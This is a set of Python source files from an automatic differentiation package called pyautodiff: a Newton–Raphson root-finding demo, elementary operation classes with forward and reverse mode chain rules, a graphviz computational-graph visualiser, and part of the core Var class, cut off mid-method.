fig, ax = plt.subplots()
ax.plot(x, y, label='val')
ax.plot(x, d, label='der')
ax.scatter(roots, cal_val_der(fn, roots)[0], label="root")
ax.grid(True, which='both')
ax.axhline(y=0, color='k')
ax.axvline(x=0, color='k')
plt.title("Use 0 to fill in +-inf")
plt.legend()
plt.show()
if __name__ == '__main__':
print("====Scalar demo====")
f = lambda x: x ** (-x) - log(x)
rtn = Newton_Raphson_method(f, 1, debug=True)
if rtn['succeed']:
root = rtn["x"]
print(f"Find a root={np.round(root, 4)}")
draw_scalar(f, [root], plt_range=[0.1, root + 0.5])
else:
print(f"Failed. Try another x0 or larger max_iters!")
print(rtn)
draw_scalar(f, [], plt_range=[1, 5])
print("====Vector demo====")
A = Var(np.array([[1, 2], [3, 4]]))
g = lambda x: A @ x - sin(exp(x))
n_roots = 0
for x0 in [[1, -1], [1, 1], [0, 0]]:
x0 = np.array(x0).reshape(-1, 1)
rtn = Newton_Raphson_method(g, x0, debug=False)
if rtn["succeed"]:
n_roots += 1
root = rtn["x"]
print(f"Find #{n_roots} root={np.round(root, 2).tolist()}")
else:
print(f"Failed. Try another x0 or larger max_iters!") | 4dpyautodiff | /4dpyautodiff-1.0.0.tar.gz/4dpyautodiff-1.0.0/applications/root_finder.py | root_finder.py |
import math
from collections import defaultdict
from functools import wraps
import numpy as np
from pyautodiff import Var, Mode
def _dunder_wrapper(fn, is_unary=False):
"""
A wrapper function to bridge dunder method and classmethod (operation).
For example, Var.__add__ = dunder_wrapper(VarAdd.binary_operation).
Or Var.__add__ = lambda a, b: VarAdd.binary_operation(a, b)
Args:
fn: operation function
is_unary: Defaults to False for binary operations like Add, Substract; True for unary operations like abs, exp.
Returns:
The wrapped function.
"""
@wraps(fn)
def wrapper(*args):
a = args[0]
if is_unary:
return fn(a)
b = args[1]
return fn(a, b)
return wrapper
class Ops:
"""
A template class for all operations for class `Var` (i.e. unary and binary operations).
For each operation, users MUST implement (at least) two functions: `op()` and `local_derivative()`.
Non-element-wise operations should re-write some more methods. See 'VarTranspose' and 'VarMatMul' as reference.
Then the propagation for forward/reverse/mix mode will be auto handled by the pipeline, which locate in
`binary_operation()` and `unary_operation()`.
"""
# Unary operation: 1 (by default)
# Binary operaton: 2 (customized)
n_operands = 1
# A string to be displayed in computational graph.
# If None, suffix of class name will be used.
# For example, exp (operation) will show `Exp` since its class name is `VarExp` in the plot.
# See ../visualization.py for its usage.
symbol = None
@classmethod
def op(cls, va, vb):
"""
Implement the numerical value operation in this function.
For unary operation: vc = f(va), return vc;
For binary operation: vc = va op vb, return vc;
To be implemented by each operation.
Args:
va: numerical value of operand a (a.val, a is a Var instance);
vb: numerical value of operand b (b.val, b is a Var instance);
Returns:
A Number or np.ndarray, the numerical value of this operation
"""
raise NotImplementedError
@classmethod
def local_derivative(cls, va, vb, vc, skip_lda=False, skip_ldb=False):
"""
Calculate the derivative for every elementary operations.
For unary operation: c = f(a), return the local partial derivative: df/da;
For binary operation: c = a op b, return the local partial derivatives df/da, df/db;
(a,b could be results of some operations)
For example,
x = Var(1, 'x')
a = x + 1
b = 2 - x
c = a * b
The local derivative dc/da = 1, dc/db = 2;
The target derivative dc/dx = dc/da*da/dx + dc/db*db/dx = 1*1 + 2*(-1) = -1
Args:
va: numerical value of operand (a Var instance) a (=a.val);
vb: numerical value of operand (a Var instance) b (=b.val);
vc: numerical value of operation result (a Var instance) c (=c.val);
skip_lda: If a is a constant, no need to calculate dc/da
skip_ldb: If b is a constant, no need to calculate dc/db
Returns:
A Number or np.ndarray for unary operation;
A list of two Numbers or np.ndarrays for binary operation;
"""
raise NotImplementedError
@classmethod
def chain_rule(cls, lda, da, ldb, db, forward_mode=True):
"""
Apply chain rule in forward mode.
For composite function: c = g(f(a, b)), dg/dx = dg/df*df/dx; dg/dy = dg/df*df/dy;
Args:
lda: A Number or np.ndarray, represents the local derivative: dc/da
da: a dict stores the derivative of a.
For example, {'x': da/dx, 'y': da/dy}, where `x`,'y' is the involved variables.
ldb: A Number or np.ndarray, represents the local derivative: dc/db
db: a dict stores the derivative of b.
For example, {'x': db/dx, 'y': db/dy}, where `x`,'y' is the involved variables.
forward_mode: defaults to True; False for reverse or mix mode.
Returns:
A dict stores the derivative of c by applying the chain rule. For example,
{'x': dc/dx, 'y': dc/dy} where `x`,'y' are the target variables.
"""
einsum_dispatcher = "ijkl,ij->ijkl" if forward_mode else "ijkl,kl->ijkl"
def _apply(d, ld):
if d is None:
return
ndim = np.ndim(ld)
if ndim == 0:
fn = lambda tot, loc: tot * loc
elif ndim == 2:
fn = lambda tot, loc: np.einsum(einsum_dispatcher, tot, loc)
else:
raise TypeError(f"Local derivative only supports scalar or 2D matrix but not {np.shape(ld)}")
for wrt in d:
dc[wrt] += fn(d[wrt], ld)
dc = defaultdict(int)
_apply(da, lda)
_apply(db, ldb)
return dict(dc)
@classmethod
def merge_var_shapes(cls, sa, sb=None):
"""
Propagate the _var_shapes to the operation result by synthesizing the _var_shapes of a and b.
BE CAREFUL, a _var_shapes (dict) instance can be shared across multiple var instances.
Don't use _var_shapes for any instance specific calculation.
Args:
sa: _var_shapes of the first operand
sb: _var_shapes of the second operand, could be None
Returns:
a dict, the merged _var_shapes
"""
if sb is None:
return sa
if sa is None:
return sb
sa.update(sb)
return sa
@classmethod
def merge_modes(cls, ma, mb=None):
"""
Merge mode by such rules:
1. Forward op reverse/mix --> mix
2. Forward op forward/NONE --> forward
3. Reverse op reverse/NONE --> reverse
4. Reverse/mix/NONE op mix --> mix
5. NONE op NONE --> NONE
Args:
ma: a.mode
mb: b.mode
Returns:
A mode value
"""
if mb is None or mb == Mode.NONE:
return ma
if ma == Mode.NONE:
return mb
if ma != mb:
return Mode.Mix
return ma
@classmethod
def fwdprop(cls, a, b, val):
"""
Propagation for forward mode. Suppose current operation : c = a op b is one step of f(x), by chain rule,
we have: dc/dx = dc/da * da/dx + dc/db * db/dx, return dc/dx.
Args:
a: the first operand, a Var instance
b: the second operand, a Var instance, could be None
val: the numerical operation result
Returns:
a dict, the derivative of operation result instance
"""
if cls.n_operands == 2:
lda, ldb = cls.local_derivative(a.val, b.val, val,
skip_lda=a.is_const,
skip_ldb=b.is_const)
return cls.chain_rule(lda, a.derivative, ldb, b.derivative)
lda = cls.local_derivative(a.val, None, val)
return cls.chain_rule(lda, a.derivative, None, None)
@classmethod
def backprop(cls, a, b, val, dfdc):
"""
Propagation for reverse/mix mode. Suppose current operation : c = a op b is one step of f(x), by chain rule,
we have: df/da = df/dc * dc/da, df/db = df/dc * dc/db.
Args:
a: the first operand, a Var instance
b: the second operand, a Var instance, could be None
val: the numerical operation result
dfdc: the backprop gradient.
Returns:
None
"""
if cls.n_operands == 2:
lda, ldb = cls.local_derivative(a.val, b.val, val,
skip_lda=a.is_const,
skip_ldb=b.is_const)
a._bpgrad.update(cls.chain_rule(lda, dfdc, None, None, False))
b._bpgrad.update(cls.chain_rule(None, None, ldb, dfdc, False))
else:
lda = cls.local_derivative(a.val, None, val)
a._bpgrad.update(cls.chain_rule(lda, dfdc, None, None, False))
@classmethod
def merge_fwd_backprop(cls, dcdxs, dfdc):
"""
Merge derivatives from forward mode and reverse mode. Suppose current node is c, in mix mode. W.r.t x, we have
dc/dx and df/dc, then PART of df/dx is df/dc * dc/dx.
Args:
dcdxs: a dict like {'x': dcdx, 'y': dcdy}
dfdc: a dict like {f: dfdc}
Returns:
a dict like {'x': dfdc (part), 'y': dfdy (part)}
"""
dfdxs = {}
for wrt in dcdxs:
dfdxs[wrt] = np.einsum("ijpq, klij->klpq", dcdxs[wrt], dfdc)
return dfdxs
@classmethod
def binary_operation(cls, a, b):
"""
A universal binary operation process. Newly defined operations (class) do not need to re-write it.
Args:
a: a Number of np.ndarray or `Var` instance, the first operand of the calculation
b: a Number of np.ndarray or `Var` instance , the second operand of the calculation
Returns:
A `Var` instance whose `.val` is the numerical value of the operation and `.derivative` containing
the derivative w.r.t. the involved variables.
"""
if not isinstance(a, Var):
a = Var(a)
if not isinstance(b, Var):
b = Var(b)
# Stop numpy auto broadcasting but allow the operation between scalar and vector,
# or the differentiation would be too complicated to deal with
if np.ndim(a.val) > 0 and np.ndim(b.val) > 0 and cls.__name__ != "VarMatMul":
assert a.val.shape == b.val.shape, f"Shapes mismatch: {a.val.shape} != {b.val.shape}"
# S1: calculate numerical result
val = cls.op(a.val, b.val)
# S2: get mode of the result
mode = cls.merge_modes(a.mode, b.mode)
# Prepare params for constructing a Var instance to contain the operation result
params = dict(derivative={},
_var_shapes=cls.merge_var_shapes(a._var_shapes, b._var_shapes),
mode=mode,
_context=[cls, [a, b]])
# Reverse/mix mode vars will calculate derivative later (when .diff() is called)
if mode not in (Mode.Forward, Mode.NONE):
return Var(val, **params)
params["derivative"] = cls.fwdprop(a, b, val)
return Var(val, **params)
@classmethod
def unary_operation(cls, a):
"""
A universal unary operation process. Newly defined operations (class) do not need to re-write it.
Args:
a: a Number of np.ndarray or `Var` instance, the first operand of the calculation
Returns:
A `Var` instance whose `.val` is the numerical value of the operation and `.derivative` containing
the derivative w.r.t. the involved variables.
"""
if not isinstance(a, Var):
a = Var(a)
# S1: calculate numerical result
val = cls.op(a.val, None)
# S2: inherit the mode for the result
mode = a.mode
# Prepare params for constructing a Var instance to contain the operation result
params = dict(derivative={},
_var_shapes=cls.merge_var_shapes(a._var_shapes),
mode=mode,
_context=[cls, [a]])
if mode not in (Mode.Forward, Mode.NONE):
return Var(val, **params)
params["derivative"] = cls.fwdprop(a, None, val)
return Var(val, **params)
class VarNeg(Ops):
"""
A class for negative constants. Gives the value and local derivative.
This class inherits from the Ops Class.
To use:
>>> -Var(1, 'x')
(<class 'pyautodiff.var.Var'> name: None val: -1, der: {'x': array([[[[-1.]]]])})
"""
symbol = "-"
@classmethod
def op(cls, va, vb):
return -va
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
return -1
class VarPos(Ops):
"""
A class for positive constants. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> +Var(1, 'x')
(<class 'pyautodiff.var.Var'> name: None val: 1, der: {'x': array([[[[1.]]]])})
"""
symbol = "+"
@classmethod
def op(cls, va, vb):
return va
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
return 1
class VarAbs(Ops):
"""
A class for absolute values. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> abs(Var(1, 'x'))
(<class 'pyautodiff.var.Var'> name: None val: 1, der: {'x': array([[[[1.]]]])})
"""
@classmethod
def op(cls, va, vb):
return abs(va)
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
d = np.ones_like(va)
d[va < 0] = -1
try:
# scalar
return d.item()
except:
return d
class VarAdd(Ops):
"""
A class for addition. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> Var(1, 'x') + 1
(<class 'pyautodiff.var.Var'> name: None val: 2, der: {'x': array([[[[1.]]]])})
>>> Var(1, 'x') + Var(2, 'y')
(<class 'pyautodiff.var.Var'> name: None val: 3, der: {'x': array([[[[1.]]]]), 'y': array([[[[1.]]]])})
"""
n_operands = 2
symbol = "+"
@classmethod
def op(cls, va, vb):
return va + vb
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
return 1, 1
class VarSub(Ops):
"""
A class for addition. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> Var(1, 'x') - 1
(<class 'pyautodiff.var.Var'> name: None val: 0, der: {'x': array([[[[1.]]]])})
>>> Var(1, 'x') - Var(2, 'y')
(<class 'pyautodiff.var.Var'> name: None val: -1, der: {'x': array([[[[1.]]]]), 'y': array([[[[-1.]]]])})
"""
n_operands = 2
symbol = "-"
@classmethod
def op(cls, va, vb):
return va - vb
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
return 1, -1
class VarMul(Ops):
"""
A class for multiplication. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> Var(1, 'x') * 2
(<class 'pyautodiff.var.Var'> name: None val: 2, der: {'x': array([[[[2.]]]])})
>>> Var(1, 'x') * Var(2, 'y')
(<class 'pyautodiff.var.Var'> name: None val: 2, der: {'x': array([[[[2.]]]]), 'y': array([[[[1.]]]])})
"""
n_operands = 2
symbol = "*"
@classmethod
def op(cls, va, vb):
return va * vb
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
return vb, va
class VarTrueDiv(Ops):
"""
A class for division. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> Var(4, 'x') / 2
(<class 'pyautodiff.var.Var'> name: None val: 2.0, der: {'x': array([[[[0.5]]]])})
>>> Var(4, 'x') / Var(2, 'y')
(<class 'pyautodiff.var.Var'> name: None val: 2.0, der: {'x': array([[[[0.5]]]]), 'y': array([[[[-1.]]]])})
"""
n_operands = 2
symbol = "/"
@classmethod
def op(cls, va, vb):
return va / vb
@classmethod
def local_derivative(cls, va, vb, vc, skip_lda=False, skip_ldb=False):
if skip_ldb:
return 1 / vb, 0
if skip_lda:
return 0, -vc / vb
return 1 / vb, -vc / vb
class VarPow(Ops):
"""
A class for power operation. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> Var(2, 'x') ** 2
(<class 'pyautodiff.var.Var'> name: None val: 4, der: {'x': array([[[[4.]]]])})
>>> Var(4, 'x') ** Var(2, 'y')
(<class 'pyautodiff.var.Var'> name: None val: 16, der: {'x': array([[[[8.]]]]), 'y': array([[[[22.18070978]]]])})
"""
n_operands = 2
symbol = "power"
@classmethod
def op(cls, va, vb):
return va ** vb
@classmethod
def local_derivative(cls, va, vb, vc, skip_lda=False, skip_ldb=False):
""" derivative of w.r.t vb and vb: b * a^(b-1)*a', a^b*ln(a)*b' """
if skip_ldb:
return vb * (va ** (vb - 1)), 0
if skip_lda:
return 0, np.log(va) * vc
return vb * (va ** (vb - 1)), np.log(va) * vc
class VarExp(Ops):
"""
A class for exponential operation. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> exp(Var(0, 'x'))
(<class 'pyautodiff.var.Var'> name: None val: 1.0, der: {'x': array([[[[1.]]]])})
"""
@classmethod
def op(cls, va, vb):
return np.exp(va)
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
""" c = e^a --> c' = e^a"""
return vc
class VarLog(Ops):
"""
A class for logarithm. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> log(Var(1, 'x'))
(<class 'pyautodiff.var.Var'> name: None val: 0.0, der: {'x': array([[[[1.]]]])})
"""
n_operands = 2
@classmethod
def op(cls, va, vb):
""" log_vb(va) """
return np.log(va) / np.log(vb)
# return np.log(va)
@classmethod
def local_derivative(cls, va, vb, vc, skip_lda=False, skip_ldb=False):
""" c'=a'/(a*ln(b)), c' = -(b'*log(a))/(b*log^2(b))) """
inv_log_vb = 1 / np.log(vb)
if skip_ldb:
return 1 / va * inv_log_vb, 0
if skip_lda:
return 0, -vc * inv_log_vb / vb
return 1 / va * inv_log_vb, -vc * inv_log_vb / vb
@classmethod
def binary_operation_with_base(clf, a, base=math.e):
""" Wrap function to explicitly specify base """
return clf.binary_operation(a, base)
class VarLogistic(Ops):
"""
Logistic function: f(x) = 1 / (1 + exp(x))
>>> sigmoid((Var(0, 'x')))
(<class 'pyautodiff.var.Var'> name: None val: 0.5, der: {'x': array([[[[0.25]]]])})
"""
@classmethod
def op(cls, va, vb):
return 1 / (1 + np.exp(-va))
@classmethod
def local_derivative(cls, va, vb, vc, skip_lda=False, skip_ldb=False):
return vc * (1 - vc)
class VarMatMul(Ops):
"""
Matrix multiplication.
>>> (Var(np.array([[1],[2]]), 'x') @ Var(np.array([[0,1]]), 'y')).val.tolist()
[[0, 1], [0, 2]]
"""
n_operands = 2
symbol = "@"
@classmethod
def op(cls, va, vb):
return va @ vb
@classmethod
def local_derivative(cls, va, vb, vc, skip_lda=False, skip_ldb=False):
return vb, va
@classmethod
def chain_rule(cls, lda, da, ldb, db, forward_mode=True):
"""
Apply chain rule in forward mode for Matmul: c = a@b
Args:
lda: A Number or np.ndarray, represents the local derivative: dc/da (b.val in this case)
da: a dict stores the derivative of a.
For example, {'x': da/dx, 'y': da/dy}, where `x`,'y' is the involved variables.
ldb: A Number or np.ndarray, represents the local derivative: dc/db (a.val in this case)
db: a dict stores the derivative of b.
For example, {'x': db/dx, 'y': db/dy}, where `x`,'y' is the involved variables.
Returns:
A dict stores the derivative of c by applying the chain rule. For example,
{'x': dc/dx, 'y': dc/dy} where `x`,'y' is the involved variables.
"""
def _apply(d, ld, s):
if d is None:
return
for wrt in d:
dc[wrt] += np.einsum(s, d[wrt], ld)
dc = defaultdict(int)
_apply(da, lda, "pqkl,qr->prkl" if forward_mode else "mnpr,qr->mnpq")
_apply(db, ldb, "qrkl,pq->prkl" if forward_mode else "mnpr,pq->mnqr")
return dict(dc)
class VarTranspose(Ops):
"""
Transpose matrix.
>>> (Var(np.array([[1,2]]), 'x').T).val.tolist()
[[1], [2]]
"""
symbol = ".T"
@classmethod
def op(cls, va, vb):
return np.transpose(va)
@classmethod
def fwdprop(cls, a, b, val):
der = {}
for wrt in a.derivative:
der[wrt] = np.einsum('ijkl->jikl', a.derivative[wrt])
return der
@classmethod
def backprop(cls, a, b, val, dfdc):
bp = {}
for wrt in dfdc:
bp[wrt] = np.einsum('ijkl->ijlk', dfdc[wrt])
a._bpgrad.update(bp)
@classmethod
def unary_operation(cls, a):
"""
A universal unary operation process. Newly defined operations (class) do not need to re-write it.
Args:
a: a Number of np.ndarray or `Var` instance, the first operand of the calculation
Returns:
A `Var` instance whose `.val` is the numerical value of the operation and `.derivative` containing
the derivative w.r.t. the involved variables.
"""
if not isinstance(a, Var):
a = Var(a)
val = cls.op(a.val, None)
mode = a.mode
params = dict(derivative={},
_var_shapes=cls.merge_var_shapes(a._var_shapes),
mode=mode,
_context=[cls, [a]])
if mode not in (Mode.Forward, Mode.NONE):
return Var(val, **params)
params["derivative"] = cls.fwdprop(a, None, val)
return Var(val, **params)
Var.__neg__ = _dunder_wrapper(VarNeg.unary_operation, True)
Var.__pos__ = _dunder_wrapper(VarPos.unary_operation, True)
Var.__abs__ = _dunder_wrapper(VarAbs.unary_operation, True)
# +=, -=, *=, /= are auto enabled.
Var.__radd__ = Var.__add__ = _dunder_wrapper(VarAdd.binary_operation)
Var.__sub__ = _dunder_wrapper(VarSub.binary_operation)
Var.__rsub__ = lambda a, b: VarSub.binary_operation(b, a)
Var.__rmul__ = Var.__mul__ = _dunder_wrapper(VarMul.binary_operation)
Var.__truediv__ = _dunder_wrapper(VarTrueDiv.binary_operation)
Var.__rtruediv__ = lambda a, b: VarTrueDiv.binary_operation(b, a)
Var.__pow__ = _dunder_wrapper(VarPow.binary_operation)
Var.__rpow__ = lambda a, b: VarPow.binary_operation(b, a)
pow = VarPow.binary_operation
# TODO: Fan
Var.__matmul__ = _dunder_wrapper(VarMatMul.binary_operation)
Var.transpose = transpose = _dunder_wrapper(VarTranspose.unary_operation, True)
exp = VarExp.unary_operation # enable exp(x)
Var.exp = _dunder_wrapper(exp, True) # enable x.exp()
log = VarLog.binary_operation_with_base
Var.log = _dunder_wrapper(log)
logistic = sigmoid = VarLogistic.unary_operation
Var.sigmoid = _dunder_wrapper(sigmoid, True)
sqrt = lambda x: x ** 0.5
Var.sqrt = sqrt | 4dpyautodiff | /4dpyautodiff-1.0.0.tar.gz/4dpyautodiff-1.0.0/pyautodiff/ops.py | ops.py |
import time
from enum import Enum
import numpy as np
from graphviz import Digraph
from pyautodiff import Mode
class NodeType(Enum):
var = 0
const = 1
operation = 2
class Viser(object):
"""
A class to draw the computational graph and auto diff trace by graphviz.Digraph (directed graph).
To distinguish the computational graph and the AD trace, two families of arrow will be used:
1. For the computational graph, use full arrow. Black one represents the first operand, while one represents the
second operand.
2. For the AD trace, use half arrow. Black one represents the Forward mode and the white for the reverse/mix mode.
If the arrow has the upper part, it indicates the var is the first operand; the lower part indicates the second
operand.
To use:
Viser(Var(1, 'x') + Var(2, 'y'), draw_AD_trace=False)
"""
def __init__(self, x, draw_AD_trace=False, horizontal=True):
"""
Args:
x: a Var instance containing the operation result
draw_AD_trace: defaults to False, plot the computational graph. If True, draw the AD trace
horizontal: defaults to True, extend the plot horizontally (lfet->right); If False, draw the plot ,
vertically (top->down).
"""
self.n_nodes = 1
self.ad_trace = draw_AD_trace
self.g = Digraph('Trace', format='png')
if horizontal:
self.g.attr(rankdir='LR')
self.g.node("0", label="output")
self._draw(x, "0")
@staticmethod
def _get_op_symbol(cls):
"""
Return the symbol of operation to display on the plot. For example, symbol of VarAdd: "+".
Args:
cls: Operation class
Returns:
"""
if cls.symbol is None:
return cls.__name__[3:]
return cls.symbol
def _get_unique_id(self):
"""
Generate a unique id for node.
Returns:
a string for id
"""
return f"{time.process_time()}_{self.n_nodes}"
@staticmethod
def _get_color(xtype):
"""
Return the color for node by node(var) type.
Args:
xtype: node type
Returns:
a string for color
"""
return {
NodeType.var: None,
NodeType.const: "darkseagreen2",
NodeType.operation: "lavender",
}[xtype]
@staticmethod
def _get_shape(xtype):
"""
Return the shape for node by node(var) type.
Args:
xtype: node type
Returns:
a string for shape
"""
return {
NodeType.var: "oval",
NodeType.const: "oval",
NodeType.operation: "box",
}[xtype]
@staticmethod
def _get_style(xtype):
"""
Return the box style for node by node(var) type.
Args:
xtype: node type
Returns:
a string for box style
"""
return {
NodeType.var: None,
NodeType.const: "filled",
NodeType.operation: "filled",
}[xtype]
@staticmethod
def _get_arrow(is_second_operand=False, ad=False, reverse_mode=False):
"""
Return the arrow type for node by node(var) type. The arrow type see the docstring of class.
Args:
xtype: node type
Returns:
a string for arrow type
"""
if ad:
if reverse_mode:
return "ornormal" if is_second_operand else "olnormal"
return "rnormal" if is_second_operand else "lnormal"
return "onormal" if is_second_operand else "normal"
@staticmethod
def _beatify_val(val):
"""Keep at most 3 digits for float"""
return np.around(val, 3)
def _draw(self, x, father, is_second_operand=False):
"""
Draw the graph recursivley. The graph stores in self.g.
Be careful, the direction of the arrow is determined by the propagation direction.
Args:
x: a var instance, a member of a composite operation
father: x's "previous" node.
is_second_operand: True/False
Returns:
None
"""
try:
cls, operands = x._context
xid = self._get_unique_id()
xlabel = self._get_op_symbol(cls)
xtype = NodeType.operation
except:
operands = []
if x.name is None:
xid = self._get_unique_id()
xlabel = f"{self._beatify_val(x.val)}"
xtype = NodeType.const
else:
xid = xlabel = x.name
xtype = NodeType.var
self.g.node(xid, label=xlabel,
color=self._get_color(xtype),
shape=self._get_shape(xtype),
style=self._get_style(xtype))
if father is not None:
if self.ad_trace and x.mode != Mode.Forward:
self.g.edge(father, xid, arrowhead=self._get_arrow(is_second_operand, True, True))
else:
self.g.edge(xid, father, arrowhead=self._get_arrow(is_second_operand, self.ad_trace, False))
for i, t in enumerate(operands):
self._draw(t, xid, i == 1)
def show(self):
"""Show the plot. For IPython/jupyter notebook, call "self.g" directly"""
self.g.view(cleanup=True, directory="/tmp")
def save(self, path):
"""Pass in a string as path, save the plot to local"""
self.g.render(path) | 4dpyautodiff | /4dpyautodiff-1.0.0.tar.gz/4dpyautodiff-1.0.0/pyautodiff/visualization.py | visualization.py |
from enum import Enum
from collections import deque, defaultdict, Counter
import time
from numbers import Number
import numpy as np
"""A global counter to count the total number of VarAutoName instances"""
G_VAR_AUTO_NAME_NUM = 0
class Mode(Enum):
Forward = 0
Reverse = 1
Mix = 2
NONE = -1
class Var(object):
"""
A class that holds variables with AutoDiff method in both forward and reverse mode.
Supports 20+ elementary functions (see ../ops.py) for scalar(Number) and 2D matrix (np.ndarray).
Attributes:
val (Number or np.ndarray): numerical value of this variable.
name (str or Number, optional): name assigned to the variable, such as "x","longlongname" or 1.1, 2.
derivative (dict): a dict that stores the derivative values w.r.t all involved variables. For example,
{"x": numerical value of dfdx, "y": numerical value of dfdy}. A 4D matrix D is used to represent
the single der such as dcdx: D_{ijkl} represents dc_{ij}/dx_{kl}.
mode (Mode): for newly declared instance, specify Forward or Reverse mode. The Mix mode will come from
the operation of a Forward mode and a non-Forward mode.
_var_shapes (dict): a dict that stores the shape of the involved variables used for squeezing the 4D
derivative matrix to 2D Jacobian matrix if necessary. For example, {"x": (1,1), "y": (2,1)}.
LEAVE IT ALONE when declare a new Var instance.
_context (list): [cls, operands] where "cls" represents the operation and operands is [a, b] if cls is
a binary operation else [a] for unary operation. LEAVE IT ALONE when declare a new Var instance.
_bpgrad (dict): a dict stores the temporary backpropagation gradiant, used for reverse mode only.
For example, u.bp = {f: 1} means dfdu = 1. The key here is the hash value of f (output, a Var instance)
while the key in u.derivative is the name of x (input, a Var instance). Similarly, a 4D matrix D is used
to represent a single gradient dfdc: D_{ijkl} represents df_{ij}/dc_{kl}.
_degree (int): "out degree" = number of usage in the computational graph, used for reverse mode only.
"""
def __init__(self, val, name=None, derivative=None, mode=Mode.Forward, _var_shapes=None, _context=None):
"""
----------
Args:
val (Number or np.ndarray): numerical value of the variable.
name (str or Number, optional): name of the variable. If None(default), the variable will be treated
as a constant, which means no derivative wrt this instance.
derivative (Number or np.ndarray, optional): a dict; Defaults to None. If name is None, derivative will be
set as an empty dict; If name is not None, derivative will be initialized as {name: 4D_matrix};
Number/np.ndarray can be passed in as the `seed` for this variable (name should not be None and the
shape of seed should match its value).
mode (Mode): Forward(default)/Reverse. The mode of const will be set as Mode.NONE.
_var_shapes (dict or None): Leave it None when declare an instance. See explanations above.
_context (list or None): Leave it None when declare an instance. See explanations above.
TO use:
>>> x = Var(1, 'x', mode=Mode.Forward)
>>> y = Var(np.array([[1],[2]]), 'y', mode=Mode.Reverse)
"""
self._val = val
if name is None or isinstance(name, (str, Number)):
self.name = name
else:
raise TypeError(f"name should be a str or Number, {type(name)} is not supported.")
# Init derivative
if isinstance(derivative, dict):
self.derivative = derivative
elif name is not None:
self.derivative = {name: self._init_seed(val, derivative)}
else:
if derivative is not None:
raise ValueError(f"Need a name!")
# Use {} instead of None to skip the type check when self.derivative is used
self.derivative = {}
# Be careful, this dict is designed for sharing across multiple instances
# which means for x = Var(1, 'x'), x.self._var_shapes can contain key="y" that is not x's "target wrt var"
self._var_shapes = _var_shapes
if name is not None:
try:
self._var_shapes[name] = np.shape(val)
except:
self._var_shapes = {name: np.shape(val)}
self.mode = Mode.NONE if self.is_const else mode
self._context = _context
# Used only for reverse mode
# Will be activated when ._reverse_diff() is called
self._degrees = None
self._bpgrad = None
def _init_seed(self, val, seed=None):
"""
Initialize the derivative for newly declared var instance. The shape of seed should match the shape of val.
Or exception will be thrown out. If val is scalar, seed must be a scalar too; If val is matrix, seed could
be a scalar or a matrix.
Args:
val: var's value, used for aligning the shape of val and derivative
seed: a Number or np.ndarray, defaults to None.
Returns:
a 4D matrix as the initial derivative.
For example (this function will be called in __init__):
>>> Var(1, 'x', 100).derivative['x'].tolist()
[[[[100.0]]]]
>>> Var(np.array([[1],[2]]), 'x', 2).derivative['x'].tolist() # output is np.ndarray
[[[[2.0], [0.0]]], [[[0.0], [2.0]]]]
>>> Var(np.array([[1],[2]]), 'x', np.array([[100],[200]])).derivative['x'].tolist()
[[[[100.0], [0.0]]], [[[0.0], [200.0]]]]
"""
if seed is None:
seed = 1
elif not isinstance(seed, (Number, np.ndarray, list)):
raise TypeError(f"Init derivative(seed) should be a ndarray or Number, {type(seed)} is not supported.")
seed = np.array(seed)
ndim = np.ndim(val)
# Init seed should be a scalar or the shape of seed should be equal to the shape of value
assert np.ndim(seed) == 0 or np.size(seed) == np.size(val), (
f"Initial derivative {np.shape(seed)} should match the shape of val {np.shape(val)}")
if ndim == 2:
k, l = val.shape
elif ndim == 0:
k = l = 1
else:
raise ValueError(f"Val only support scalar/2D-matrix. Input: {val.shape}")
return np.einsum('ij,kl->ikjl', np.eye(k) * seed, np.eye(l))
def __str__(self):
return f"(val: {self.val}, der: {self.derivative})"
def __repr__(self):
return f"({self.__class__} name: {self.name} val: {self.val}, der: {self.derivative})"
def __eq__(self, b):
"""Only compare the `val` and `derivative`. `name` is ignored."""
if not isinstance(b, Var) or not np.allclose(self.val, b.val) or not (
self.derivative.keys() == b.derivative.keys()):
return False
for wrt in self.derivative.keys():
# TODO: Fan
# Use np.array_equal instead to check the shape?
if not np.allclose(self.derivative[wrt], b.derivative[wrt]):
return False
return True
@property
def val(self):
"""Return numerical value of variable"""
return self._val
@val.setter
def val(self, v):
"""Set numerical value for variable"""
self._val = v
def _squeeze_der(self, name, v):
"""
Squeeze the 4D derivative matrix to match the expectation of Jacobian matrix. The output shape is listed below:
Input type --> output type: Jacobian matrix type
Scalar --> scalar: scalar
Scalar --> vector((n,1) or (1,n)): 2D matrix(n,1)
Vector((n,1) or (1,n)) --> scalar: 2D matrix(1,n)
Vector((n,1) or (1,n)) --> Vector((m,1) or (1,m)): 2D matrix(m,n)
Matrix((m,n)) --> matrix((p,q)): 3D matrix if one of m,n,p,q is 1 else 4D matrix
Args:
name: name of target var instance
v: 4D derivative matrix
Returns:
A scalar or matrix, the squeezed derivative.
"""
shape = self._var_shapes[name]
if len(shape) == 0:
try:
return v.item()
except:
return np.squeeze(np.squeeze(v, -1), -1)
m, n, k, l = v.shape
assert (k, l) == shape, f"var shape {shape} and der shape: {self.val.shape} mismatch!"
if l == 1:
v = np.squeeze(v, -1)
elif k == 1:
v = np.squeeze(v, -2)
if n == 1:
v = np.squeeze(v, 1)
elif m == 1:
v = np.squeeze(v, 0)
return v
def __hash__(self):
return id(self)
def _count_degrees(self):
"""
Count "out degree" for every involved var instance for reverse mode.
Returns: a dict where key = node, val = out degree
"""
q = deque()
q.append(self)
degrees = Counter()
visited = defaultdict(bool)
while len(q) > 0:
v = q.popleft()
if v._context is None:
continue
_, operands = v._context
for t in operands:
degrees[t] += 1
if not visited[t]:
visited[t] = True
q.append(t)
return degrees
def _backward(self):
"""
Recursively trace back along the computational graph to propagate the derivative from output to input.
See more explanations in code comments.
"""
